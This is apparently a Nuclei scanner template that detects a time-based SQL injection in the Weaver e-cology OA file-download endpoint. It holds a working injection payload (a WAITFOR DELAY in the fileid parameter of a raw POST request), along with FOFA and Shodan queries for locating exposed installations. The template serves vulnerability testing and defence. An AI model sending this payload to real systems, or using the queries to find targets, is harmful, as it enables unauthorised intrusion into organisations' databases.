http:
    - matchers:
        - condition: and
          dsl:
            - duration>=7
            - status_code == 200
            - content_length == 0
            - contains(set_cookie, "ecology_JSessionid=")
          type: dsl
      raw:
        - |
          @timeout: 15s
          POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
          Host: {{Hostname}}

          isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7'
id: ecology-oa-file-sqli
info:
    author: momika233
    description: |
        e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
    metadata:
        fofa-query: app="泛微-协同办公OA"
        max-request: 1
        shodan-query: ecology_JSessionid
        verified: true
    name: E-cology FileDownloadForOutDocSQL - SQL Injection
    reference:
        - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
    severity: high
    tags:
        - ecology
        - ecology-oa
        - 泛微-协同办公OA
